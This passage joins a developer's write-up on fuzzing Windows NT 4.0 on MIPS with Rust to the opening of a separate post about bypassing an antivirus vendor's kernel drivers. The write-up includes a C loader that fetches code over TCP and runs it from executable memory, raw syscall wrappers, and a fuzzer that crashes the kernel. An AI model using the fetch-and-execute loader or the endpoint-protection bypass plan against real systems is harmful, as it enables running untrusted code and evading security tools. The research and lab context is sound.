	SOCKET sock;
	WSADATA wsaData;
	unsigned int len;
	unsigned char *buf;
	unsigned int off = 0;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("192.168.1.2");
	sockaddr.sin_port = htons(1234);

	// Connect to the socket
	if(connect(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "connect() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload length
	if(recv(sock, (char*)&len, sizeof(len), 0) != sizeof(len)) {
		fprintf(stderr, "recv() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload
	buf = malloc(len);
	if(!buf) {
		perror("malloc() error ");
		return -1;
	}

	while(off < len) {
		int bread;
		unsigned int remain = len - off;
		bread = recv(sock, buf + off, remain, 0);
		if(bread <= 0) {
			fprintf(stderr, "recv(pl) error : %d", WSAGetLastError());
			return -1;
		}

		off += bread;
	}

	printf("Read everything %u\n", off);

	// FELF0001 + u64 entry + u64 base
	if(len < 3 * 8) {
		fprintf(stderr, "Invalid FELF\n");
		return -1;
	}

	{
		char *ptr = buf;
		unsigned int entry, base, hi, end;

		if(memcmp(ptr, "FELF0001", 8)) {
			fprintf(stderr, "Missing FELF header\n");
			return -1;
		}
		ptr += 8;

		entry = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		base = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		end = base + (len - 3 * 8);
		printf("Loading at %x-%x (%x) entry %x\n", base, end, end - base, entry);

		{
			unsigned int align_base = base & ~0xffff;
			unsigned int align_end  = (end + 0xffff) & ~0xffff;
			char *alloc = VirtualAlloc((void*)align_base,
				align_end - align_base, MEM_COMMIT | MEM_RESERVE,
				PAGE_EXECUTE_READWRITE);
			printf("Alloc attempt %x-%x (%x) | Got %p\n",
				align_base, align_end, align_end - align_base, alloc);
			if(alloc != (void*)align_base) {
				fprintf(stderr, "VirtualAlloc() error : %d\n", GetLastError());
				return -1;
			}

			// Copy in the code
			memcpy((void*)base, ptr, end - base);
		}

		// Jump to the entry
		((void (*)(SOCKET))entry)(sock);
	}

	return 0;
}

It’s not the best quality code, but it gets the job done. Nevertheless, this allows us to run whatever Rust program we develop in the VM! Running this client executable is all we need now.

Remote remote code execution

Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly a lot more than I want to have in my build process. I kind of think any build, dev, and test cycle that takes longer than a few seconds is just too painful to use. I don’t really care how complex the project is. In Chocolate Milk I demonstrated that I could build, upload to my server, hot replace, download Windows VM images, and launch hundreds of Windows VMs as part of my sub-2-second build process. This is an OS and hypervisor with hotswapping and re-launching of hundreds of Windows VMs in seconds (I think milliseconds for the upload, hot swap, and Windows VM launches if you ignore the 1-2 second Rust build). There’s just no excuse for shitty build and test processes for small projects like this.

Okay, very subtle flex aside, we need a better process. Luckily, we can remotely execute our remote code. To do this I created a server that runs inside the guest that waits for connections. On a connection it simply calls CreateProcess() and launches the client we talked about before. Now, we can “poke” the guest by simply connecting and disconnecting to the TCP port we forwarded.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d\n", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
	sockaddr.sin_port = htons(42069);

	if(bind(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "bind() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Listen for connections
	if(listen(sock, 5) == SOCKET_ERROR) {
		fprintf(stderr, "listen() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Wait for a client
	for( ; ; ) {
		STARTUPINFO si = { 0 };
		PROCESS_INFORMATION pi = { 0 };
		SOCKET client = accept(sock, NULL, NULL);

		// Upon getting a TCP connection, just start
		// a separate client process. This way the
		// client can crash and burn and this server
		// stays running just fine.
		CreateProcess(
			"client.exe",
			NULL,
			NULL,
			NULL,
			FALSE,
			CREATE_NEW_CONSOLE,
			NULL,
			NULL,
			&si,
			&pi
		);

		// We don't even transfer data, we just care about
		// the connection kicking off a client.
		closesocket(client);
	}

	return 0;
}

Very fancy code. Anyways with this in place, now we can just add a nc -w 0 127.0.0.1 5555 to our Makefile, and now the VM will download and run the new code we build. Combine this with cargo watch and now when we save one of the Rust files we’re working on, it’ll build, poke the VM, and run it! A simple :w and we have instant results from the VM!

(If you’re wondering, we create the client in a different process so we don’t lose the server if the client crashes, which it will)

Rust without OS support

Rust is designed to have a split of some of the core features of the language. There’s core which contains the bare essentials to have a usable language, alloc which gives you access to dynamic allocations, and std which gives you a OS-agnostic wrapper of common OS-level constructions like files, threads, and sockets.

Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately don’t have the ability to use std. However, we can still use core and alloc with a small amount of work.

Rust has one of the best cross-compiling supports of any compiler, as you can simply have Rust build core for your target, even if you don’t have the pre-compiled package. core is simple enough that it’s a few second build process, so it doesn’t really complicate your build. Seriously, look how cool this is:

cargo new --bin rustexample
#![no_std]
#![no_main]

#[panic_handler]
fn panic_handler(_info: &core::panic::PanicInfo) -> ! {
    loop {}
}

#[no_mangle]
pub unsafe extern fn __start() -> ! {
    unimplemented!();
}
pleb@gamey ~/rustexample $ cargo build --target mipsel-unknown-none -Zbuild-std=core
   Compiling core v0.0.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core)
   Compiling compiler_builtins v0.1.49
   Compiling rustc-std-workspace-core v1.99.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core)
   Compiling rustexample v0.1.0 (/home/pleb/rustexample)
    Finished dev [unoptimized + debuginfo] target(s) in 8.84s

And there you go, you have a Rust binary for mipsel-unknown-none without having to download any pre-built toolchains, a libc, anything. You can immediately start building your program, using Rust-level constructs like slices and arrays with bounds checking, closures, whatever. No libc, no pre-built target-specific toolchains, nothing.

OS development in user-land

For educational reasons, and totally not because I just find it more fun, I decided that this project would not leverage the existing C libraries we have that do indeed exist in the MIPS guest. We could of course write PE importers to leverage the existing kernel32.dll and user32.dll present in all Windows processes by default, but no, that’s not fun. We can justify this by saying that the goal of this project is to fuzz the NT kernel, and thus we need to understand what syscalls look like.

So, with that in mind, we’re basically on our own. We’re effectively writing an OS in user-land, as we have absolutely no libraries or features by default. We have to write our inline assembly and work with raw pointers to bootstrap our execution environment for Rust.

The very first thing we need is a way of outputting debug information. I don’t care how we do this. It could be a file, a socket, the stdout, who cares. To do this, we’ll need to ask the kernel to do something via a syscall.

Syscall Layer

To invoke syscalls, we need to conform to a somewhat “custom” calling convention. System calls effectively are always indexed by some integer, selecting the API that you want to invoke. In the case of MIPS this is put into the $v0 register, which is not normally used as a calling convention. Thus, to perform a syscall with this modified convention, we have to use some assembly. Luckily, the rest of the calling convention for syscalls is unmodified from the standard MIPS o32 ABI, and we can pass through everything else.

To pass everything as is to the syscall we actually have to make sure Rust is using the same ABI as the kernel, we do this by declaring our function as extern, which switches us to the default MIPS o32 C ABI. Technically I think Windows does floating point register passing different than o32, but we’ll cross that bridge when we get there.

We need to be confident that the compiler is not emitting some weird prologue or moving around registers in our syscall function, and luckily Rust comes to the rescue again with a #[naked] function decorator. This marks the function as never inline-able, but also guarantees that no prolog or epilog are present in the function. This is common in a lot of low level languages, but Rust goes a step further and requires that naked functions only contain a single assembly statement that must not return (you must manually handle the return), and that your assembly is the first code that executes. Ultimately, it’s really just a global label on inline assembly with type information. Sweet.

So, we simply have to write a syscall helper for each number of arguments we want to support like such:

/// 2-argument syscall
#[allow(unused)]
#[naked]
pub unsafe extern fn syscall2(_: usize, _: usize, id: usize) -> usize {
    asm!(r#"
        move $v0, $a2
        syscall
    "#, options(noreturn));
}

We mark the function as naked, pass in the syscall ID as the last parameter (as to not disturb the ordering of the earlier parameters which we pass through to the syscall), move the syscall ID to $v0, and invoke the syscall. Weirdly, for MIPS, the syscall does not return to the instruction after the syscall, it actually returns to $ra, the return address, so it’s critical that the function is never inlined as this wrapper relies on returning back to the call site of the caller of syscall2(). Luckily, naked ensures this for us, and thus this wrapper is sufficient for syscalls!

Getting output

Back to the console, we initially started with trying to do stdout, but according to Twitch chat it sounds like old Windows this was actually done via some RPC with conhost. So, we abandoned that. We wrote a tiny example of using a NtOpenFile() and NtWriteFile() syscall to drop a file to disk with a log, and this was a cool example of early syscalls, but still not convenient.

Remember, I’m picky about the development cycle.

So, we decided to go with a socket for our final build. Unfortunately, creating a socket in Windows via syscalls is actually pretty hard (I think it’s done mainly over IOCTLs), but we cheated here and just passed the handle from the FELF loader that already had to connect to our host. We can simply change our FELF server to serve the FELF to the VM and then recv() forever, printing out the console output. Now we have a remote console output.

Windows Syscalls

Windows syscalls are a lot heavier than what you might be used to on UNIX, they are also sometimes undocumented. Luckily, the NtWriteFile() syscall that we really need is actually not too bad. It takes a file handle, some optional stuff we don’t care about, an IO_STATUS_BLOCK (which returns number of bytes written), a buffer, a length, and an offset in the file to write to.

/// Write to a file
pub fn write(fd: &Handle, bytes: impl AsRef<[u8]>) -> Result<usize> {
    let mut offset = 0u64;
    let mut iosb = IoStatusBlock::default();

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall9(
            // [in] HANDLE FileHandle
            fd.0,

            // [in, optional] HANDLE Event
            0,

            // [in, optional] PIO_APC_ROUTINE ApcRoutine,
            0,

            // [in, optional] PVOID ApcContext,
            0,

            // [out] PIO_STATUS_BLOCK IoStatusBlock,
            addr_of_mut!(iosb) as usize,

            // [in] PVOID Buffer,
            bytes.as_ref().as_ptr() as usize,

            // [in] ULONG Length,
            bytes.as_ref().len(),

            // [in, optional] PLARGE_INTEGER ByteOffset,
            addr_of_mut!(offset) as usize,

            // [in, optional] PULONG Key
            0,

            // Syscall number
            Syscall::WriteFile as usize)
    } as u32);

    // If success, return number of bytes written, otherwise return error
    if status.success() {
        Ok(iosb.information)
    } else {
        Err(status)
    }
}

Rust print!() and formatting

To use Rust in the best way possible, we want to have support for the print!() macro, this is the printf() of the Rust world. It happens to be really easy to add support for!

/// Writer structure that simply implements [`core::fmt::Write`] such that we
/// can use `write_fmt` in our [`print!`]
pub struct Writer;

impl core::fmt::Write for Writer {
    fn write_str(&mut self, s: &str) -> core::fmt::Result {
        let _ = crate::syscall::write(unsafe { &SOCKET }, s);

        Ok(())
    }
}

/// Classic `print!()` macro
#[macro_export]
macro_rules! print {
    ($($arg:tt)*) => {
        let _ = core::fmt::Write::write_fmt(
            &mut $crate::print::Writer, core::format_args!($($arg)*));
    }
}

Simply create a dummy structure, implement core::fmt::Write on it, and now you can directly use Write::write_fmt() to write format strings. All you have to do is implement a sink for &strs, which is really just a char* and a length. In our case, we invoke the NtWriteFile() syscall with our socket we saved from the client.

Viola, we have remote output in a nice development environment:

pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf


Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790
fn main() -> Result<(), ()> {
    println!("Hello world from Rust at {:#x}", main as usize);
    Ok(())
}

It’s that easy!

Memory allocation

Now that we have the basic ability to print things and use Rust, the next big feature that we’re missing is the ability to dynamically allocate memory. Luckily, we talked about the alloc feature of Rust before. Now, alloc isn’t something you get for free. Rust doesn’t know how to allocate memory in the environment you’re running it in, so you need to implement an allocator.

Luckily, once again, Rust is really friendly here. All you have to do is implement the GlobalAlloc trait on a global structure. You implement an alloc() function which takes in a Layout (size and alignment) and returns a *mut u8, NULL on failure. Then you have a dealloc() where you get the pointer that was used for the allocation, the Layout again (actually really nice to know the size of the allocation at free() time) and that’s it.

Since we don’t care too much about the performance of our dynamic allocator, we’ll just pass this information through directly to the NT kernel by doing virtual memory maps and frees.

use alloc::alloc::{Layout, GlobalAlloc};

/// Implementation of the global allocator
struct GlobalAllocator;

/// Global allocator object
#[global_allocator]
static GLOBAL_ALLOCATOR: GlobalAllocator = GlobalAllocator;

unsafe impl GlobalAlloc for GlobalAllocator {
    unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
        crate::syscall::mmap(0, layout.size()).unwrap_or(core::ptr::null_mut())
    }
    
    unsafe fn dealloc(&self, addr: *mut u8, _layout: Layout) {
        crate::syscall::munmap(addr as usize)
            .expect("Failed to deallocate memory");
    }
}

As for the syscalls, they’re honestly not too bad for this either that I won’t go into more detail. You’ll notice these are similar to VirtualAlloc() that is a common API in Windows development.

/// Allocate virtual memory in the current process
pub fn mmap(mut addr: usize, mut size: usize) -> Result<*mut u8> {
    /// Commit memory
    const MEM_COMMIT: u32 = 0x1000;

    /// Reserve memory range
    const MEM_RESERVE: u32 = 0x2000;

    /// Readable and writable memory
    const PAGE_READWRITE: u32 = 0x4;

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall6(
            // [in] HANDLE ProcessHandle,
            !0,

            // [in, out] PVOID *BaseAddress,
            addr_of_mut!(addr) as usize,

            // [in] ULONG_PTR ZeroBits,
            0,

            // [in, out] PSIZE_T RegionSize,
            addr_of_mut!(size) as usize,

            // [in] ULONG AllocationType,
            (MEM_COMMIT | MEM_RESERVE) as usize,

            // [in] ULONG Protect
            PAGE_READWRITE as usize,

            // Syscall ID
            Syscall::AllocateVirtualMemory as usize,
        )
    } as u32);

    // If success, return allocation otherwise return status
    if status.success() {
        Ok(addr as *mut u8)
    } else {
        Err(status)
    }
}
    
/// Release memory range
const MEM_RELEASE: u32 = 0x8000;

/// De-allocate virtual memory in the current process
pub unsafe fn munmap(mut addr: usize) -> Result<()> {
    // Region size
    let mut size = 0usize;

    // Perform syscall
    let status = NtStatus(syscall4(
        // [in] HANDLE ProcessHandle,
        !0,

        // [in, out] PVOID *BaseAddress,
        addr_of_mut!(addr) as usize,

        // [in, out] PSIZE_T RegionSize,
        addr_of_mut!(size) as usize,

        // [in] ULONG AllocationType,
        MEM_RELEASE as usize,

        // Syscall ID
        Syscall::FreeVirtualMemory as usize,
    ) as u32);

    // Return error on error
    if status.success() {
        Ok(())
    } else {
        Err(status)
    }
}

And viola. Now we can use Strings, Boxs, Vecs, BTreeMaps, and a whole list of other standard data structures in Rust. At this point, other than file I/O, networking, and threading, this environment is probably capable of running pretty much any generic Rust code, just by implementing two simple allocation functions. How cool is that!?

Threading

Some terrible person in my chat just had to ask “what about threading support”. Of course, this could be an off handed comment that I dismiss or laugh at, but yeah, what about threading? After all, we want to write a fuzzer, and without threads it’ll be hard to hit those juicy, totally necessary on 1996 software, race conditions?!

Well, this threw us down a huge loop. First of all, how do we actually create threads in Windows, and next, how do we do it in a Rust-style way of using closures that can be join()ed to get the return result.

Creating threads on Windows

Unfortunately, creating threads on Windows requires the NtCreateThread() syscall. This is not documented, and honestly took a pretty long time to figure out. You don’t actually give it a function pointer to execute and a parameter like most thread creation libraries at a higher level.

Instead, you actually give it an entire CONTEXT. In Windows development, the CONTEXT structure is a very-specific-to-your-architecture structure that contains all of the CPU register state. So, you actually have to figure out the correct CONTEXT shape for your architecture (usually there are multiple, controlled by heavy #ifdefs). This might have taken us an hour to actually figure out, I don’t remember.

On top of this, you also provide it the stack register. Yep, you heard that right, you have to create the stack for the thread. This is yet another step that I wasn’t really expecting that added to the complexity.

Anyways, at the end of the day, you launch a new thread in your process, you give it a CPU context (and by nature a stack and target entry address), and let it run off and do its thing.

However, this isn’t very Rust-like. Rust allows you to optionally join() on a thread to get the return result from it, further, threads are started as closures so you can pass in arbitrary parameters to the thread with super convenient syntax either by move or by reference.

Threading in Rust

This leads to a hard-ish problem. How do we get Rust-style threads? Until we wrote this, I never really even thought about it. Initially we thought about some fancy static ways of doing it, but ultimately, due to using closures, you must put information on the heap. It’s obvious in hindsight, but if you want to move ownership of some of your stack locals into this thread, how are you possibly going to do that without storing it somewhere. You can’t let the thread use the parents stack, that wouldn’t work to well.

So, we implemented a spawn routine that would take in a closure (with the same constraints of Rust’s own std::thread::spawn), put the closure into a Box, turning it into a dynamically dispatched trait (vftables and friends), while moving all of the variables captured by the closure into the heap.

We then can invoke NtCreateThread() with a stack that we created, point the thread at a simple trampoline and pass in a pointer to the raw backing of the Box. Then, in the trampoline, we can convert the raw pointer back into a Box and invoke it! Now we’ve run the closure in the thread!

Return values

Unfortunately, this only gets us execution of the closure. We still have to add the ability to get return values from the thread. This has a unique design problem that the return value has to be accessible to the thread which created it, while also being accessible to the thread itself to initialize. Since the creator of the thread can also just ignore the result of the thread, we can’t free the return storage if the creator doesn’t want it as the thread won’t know that information (or you’d have to communicate it).

So, we ended up using an Arc<>. This is an atomic reference counted heap allocated structure in Rust, and it ensures that the value lives as long as there is one reference. This works perfectly for this situation, we give one copy of the Arc to the thread (ref count 1), and then another copy to the creator of the thread (ref count 2). This way, the only way the storage for the Arc is freed is if both the thread and creator are done with it.

Further, we need to ensure some level of synchronization with the thread as the creator cannot check this return value of the thread until the thread has initialized it. Luckily, we can accomplish this in two ways. One, when a user join()s on a thread, it blocks until that thread finishes execution. To do this we invoke NtWaitForSingleObject() that takes in a HANDLE, given to us when we created the thread, and a timeout. By setting an infinite timeout we can ensure that we do not do anything until the thread is done.

This leaves some implementation specific details about threads up in the air, like what happens with thread early termination, crashes, etc. Thus, we want to also ensure the return value has been updated in another way.

We did this by being creative with the Arc reference count. The Arc reference count can only be decreased by the thread when the Arc goes out of scope, and due to the way we designed the thread, this can only happen once the value has been successfully initialized.

Thus, in our main thread, we can call Arc::try_unwrap() on our return value, this will only succeed if we are the only reference to the Arc, thus atomically ensuring that the thread has successfully updated the return value!

Now we have full Rust-style threading, ala:

fn main() -> Result<(), ()> {
    let a_local_value = 5;

    let thr = syscall::spawn(move || {
        println!("Hello world from Rust thread {}", a_local_value);
        core::cell::RefCell::new(22)
    }).unwrap();

    println!("Return val: {:?}", thr.join().unwrap());

    Ok(())
}
Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }

HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating system from almost 20 years prior to Rust even existing! We have all the safety and fun features of bounds checking, dynamically growing vectors, scope-based dropping of references, locks, and allocations, etc.

Cleaning it all up

Unfortunately, we have a few leaks. We leak the handle that we got from when we created the thread, and we also leak the stack of the thread itself. This is actually a tough-ish problem. How do we free the stack of a thread when we don’t know when it exits (as the creator of the thread might never join() it).

Well, the first problem is easy. Implement a Handle type, implement a Drop handler on it, and Rust will automatically clean up the handle when it goes out of scope by calling the NtClose() in our Drop handler. Phew, that’s easy.

Freeing the stack is a bit harder, but we decided that the best route would be to have the thread free its own stack. This isn’t too hard, it just means that we must free the stack and exit the thread without touching the stack, ideally without using any globals as that would have race conditions.

Luckily, we can do this just fine if we implement the syscalls we need directly in one assembly block where we know we have full control.

// Region size
let mut rsize = 0usize;

// Free the stack and then exit the thread. We do this in one assembly
// block to ensure we don't touch any stack memory during this stage
// as we are freeing the stack.
unsafe {
    asm!(r#"
        // Set the link register
        jal 2f

        // Exit thread
        jal 3f
        break

    2:
        // NtFreeVirtualMemory()
        li $v0, {free}
        syscall

    3:
        // NtTerminateThread()
        li $v0, {terminate}
        li $a0, -2 // GetCurrentThread()
        li $a1, 0  // exit code
        syscall

    "#, terminate = const Syscall::TerminateThread   as usize,
        free      = const Syscall::FreeVirtualMemory as usize,
        in("$4") !0usize,
        in("$5") addr_of_mut!(stack),
        in("$6") addr_of_mut!(rsize),
        in("$7") MEM_RELEASE, options(noreturn));
}

Interestingly we do technically have to pass a stack variable to NtFreeVirtualMemory() but that’s actually okay as either the kernel updates that variable before freeing the stack, and thus it’s fine, or it updates the variable as an untrusted user pointer after freeing the stack, and returns with an error. We don’t really care either way as the stack is freed. Then, all we have to do is call NtTerminateThread() and we’re all done.

Huzzah, fancy Rust threading, no memory leaks, (hopefully) no race conditions.

/// Spawn a thread
///
/// MIPS specific due to some inline assembly as well as MIPS-specific context
/// structure creation.
pub fn spawn<F, T>(f: F) -> Result<JoinHandle<T>>
        where F: FnOnce() -> T,
              F: Send + 'static,
              T: Send + 'static {
    // Holder for returned client handle
    let mut handle = 0usize;

    // Placeholder for returned client ID
    let mut client_id = [0usize; 2];

    // Create a new context
    let mut context: Context = unsafe { core::mem::zeroed() };

    // Allocate and leak a stack for the thread
    let stack = vec![0u8; 4096].leak();

    // Initial TEB, maybe some stack stuff in here!?
    let initial_teb = [0u32; 5];

    /// External thread entry point
    extern fn entry<F, T>(func:      *mut F,
                          ret:       *mut UnsafeCell<MaybeUninit<T>>,
                          mut stack:  usize) -> !
            where F: FnOnce() -> T,
                  F: Send + 'static,
                  T: Send + 'static {
        // Create a scope so that we drop `Box` and `Arc`
        {
            // Re-box the FFI'd type
            let func: Box<F> = unsafe {
                Box::from_raw(func)
            };

            // Re-box the return type
            let ret: Arc<UnsafeCell<MaybeUninit<T>>> = unsafe {
                Arc::from_raw(ret)
            };

            // Call the closure and save the return
            unsafe { (&mut *ret.get()).write(func()); }
        }

        // Region size
        let mut rsize = 0usize;

        // Free the stack and then exit the thread. We do this in one assembly
        // block to ensure we don't touch any stack memory during this stage
        // as we are freeing the stack.
        unsafe {
            asm!(r#"
                // Set the link register
                jal 2f

                // Exit thread
                jal 3f
                break

            2:
                // NtFreeVirtualMemory()
                li $v0, {free}
                syscall

            3:
                // NtTerminateThread()
                li $v0, {terminate}
                li $a0, -2 // GetCurrentThread()
                li $a1, 0  // exit code
                syscall

            "#, terminate = const Syscall::TerminateThread   as usize,
                free      = const Syscall::FreeVirtualMemory as usize,
                in("$4") !0usize,
                in("$5") addr_of_mut!(stack),
                in("$6") addr_of_mut!(rsize),
                in("$7") MEM_RELEASE, options(noreturn));
        }
    }

    let rbox = unsafe {
        /// Control context
        const CONTEXT_CONTROL: u32 = 1;

        /// Floating point context
        const CONTEXT_FLOATING_POINT: u32 = 2;

        /// Integer context
        const CONTEXT_INTEGER: u32 = 4;

        // Set the flags for the registers we want to control
        context.context.bits64.flags =
            CONTEXT_CONTROL | CONTEXT_FLOATING_POINT | CONTEXT_INTEGER;

        // Thread entry point
        context.context.bits64.fir = entry::<F, T> as usize as u32;

        // Set `$a0` argument
        let cbox: *mut F = Box::into_raw(Box::new(f));
        context.context.bits64.int[4] = cbox as u64;
        
        // Create return storage in `$a1`
        let rbox: Arc<UnsafeCell<MaybeUninit<T>>> =
            Arc::new(UnsafeCell::new(MaybeUninit::uninit()));
        context.context.bits64.int[5] = Arc::into_raw(rbox.clone()) as u64;

        // Pass in stack in `$a2`
        context.context.bits64.int[6] = stack.as_mut_ptr() as u64;

        // Set the 64-bit `$sp` to the end of the stack
        context.context.bits64.int[29] =
            stack.as_mut_ptr() as u64 + stack.len() as u64;
        
        rbox
    };

    // Create the thread
    let status = NtStatus(unsafe {
        syscall8(
            // OUT PHANDLE ThreadHandle
            addr_of_mut!(handle) as usize,

            // IN ACCESS_MASK DesiredAccess
            0x1f03ff,

            // IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
            0,

            // IN HANDLE ProcessHandle
            !0,

            // OUT PCLIENT_ID ClientId
            addr_of_mut!(client_id) as usize,

            // IN PCONTEXT ThreadContext,
            addr_of!(context) as usize,

            // IN PINITIAL_TEB InitialTeb
            addr_of!(initial_teb) as usize,

            // IN BOOLEAN CreateSuspended
            0,

            // Syscall number
            Syscall::CreateThread as usize
        )
    } as u32);

    // Convert error to Rust error
    if status.success() {
        Ok(JoinHandle(Handle(handle), rbox))
    } else {
        Err(status)
    }
}

Fun oddities

While doing this work it was fun to notice that it seems that threads do not die upon crashing. It would appear that the thread initialization thunk that Windows normally shims in when you create a thread must register some sort of exception handler which then fires and the thread itself reports the information to the kernel. At least in this version of NT, the thread did not die, and the process didn’t crash as a whole.

“Fuzzing” Windows NT

Windows NT 4.0 blue screen of death

Of course, the point of this project was to fuzz Windows NT. Well, it turns out that literally the very first thing we did… randomly invoke a syscall, was all it took.

/// Worker thread for fuzzing
fn worker(id: usize) {
    // Create an RNG
    let rng = Rng::new(0xe06fc2cdf7b80594 + id as u64);

    loop {
        unsafe {
            syscall::syscall0(rng.next() as usize);
        }
    }
}

Yep, that’s all it took.

Debugging Windows NT Blue Screens

Unfortunately, we’re in a pretty legacy system and our tools for debugging are limited. Especially for MIPS executables for Windows. Turns out that Ghidra isn’t able to load MIPS PEs at all, and Binary Ninja has no support for the debug information.

We started by writing a tool that would scrape the symbol output and information from mipskd (which works really similar to modern KD), but unfortunately one of the members of my chat claimed a chat reward to have me drop whatever I was doing and rewrite it in Rust.

At the moment we were writing a hacky batch script to dump symbols in a way we could save to disk, rip out of the VM, and then use in Binary Ninja. However, well, now I had to do this all in Rust.

Parsing DBG COFF

The debug files that ship with Windows NT on the ISO are DI magic-ed files. These are separated debug information with a slightly specialized debug header with COFF symbol information. This format is actually relatively well documented, so writing the parser wasn’t too much effort. Most of the development time was trying to figure out how to correlate source line information to addresses. Ultimately, the only possible method to do this that I found was to use the statefulness of the sequence of debug symbol entries to associate the current file definition (in sequence with debug symbols) with symbols that are described after it.

I don’t know if this is the correct design, as I didn’t find it documented everywhere. It is standardized in a few documents, but these DBG files did not follow that format.

I ultimately wrote coff_nm for this parsing, which simply writes to stdout with the format:

F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>

Binary Ninja

Binary Ninja with Pinball.exe open and symbolized

(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet Pinball game you know and love)

I wrote a very simple Binary Ninja script that allowed me to import this debug information into the program:

from binaryninja import *
import re, subprocess

def load_dbg_file(bv, function):
    rex = re.compile("^([FGS]) ([0-9a-f]{8}) (.*)$")

    # Prompt for debug file input
    dbg_file = interaction \
        .get_open_filename_input("Debug file",
        "COFF Debug Files (*.dbg *.db_)")

    if dbg_file:
        # Parse the debug file
        output = subprocess.check_output(["dbgparse", dbg_file]).decode()
        for line in output.splitlines():
            (typ, addr, name) = rex.match(line).groups()
            addr = bv.start + int(addr, 16)

            (mangle_typ, mangle_name) = demangle.demangle_ms(bv.arch, name)
            if type(mangle_name) == list:
                mangle_name = "::".join(mangle_name)

            if typ == "F":
                # Function
                bv.create_user_function(addr)
                bv.define_user_symbol(Symbol(SymbolType.FunctionSymbol, addr, mangle_name, raw_name=name))
                if mangle_typ != None:
                    bv.get_function_at(addr).function_type = mangle_typ
            elif typ == "G":
                # Global
                bv.define_user_symbol(Symbol(SymbolType.DataSymbol, addr, mangle_name, raw_name=name))
            elif typ == "S":
                # Sourceline
                bv.set_comment_at(addr, name)

        # Update analysis
        bv.update_analysis()

PluginCommand.register_for_address("Load COFF DBG file", "Load COFF .DBG file from disk", load_dbg_file)

This simply prompts the user for a file, invokes the dbgparse tool, parses the output, and then uses Binary Ninjas demangling to demangle names and extract type information (for mangled names). This script tells Binja what functions we know exist, the names of them, and the typing of them (from mangling information), it also applies symbols for globals, and finally it applies source line information as comments.

Thus, we now have a great environment for reading and reviewing NT code for analyzing the crashes we find with our “fuzzer”!

Conclusion

Well, this has gotten a lot longer than expected, and it’s also 5am so I’m just going to upload this as is, so hopefully it’s not a mess as I’m not reading through it to check for errors. Anyways, I hope you enjoyed this write up the 3 streams so far on this content. It’s been a really fun project, and I hope that you tune into my live streams and watch the next steps unfold!

~Gamozo

Kernel Karnage – Part 3 (Challenge Accepted)

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing
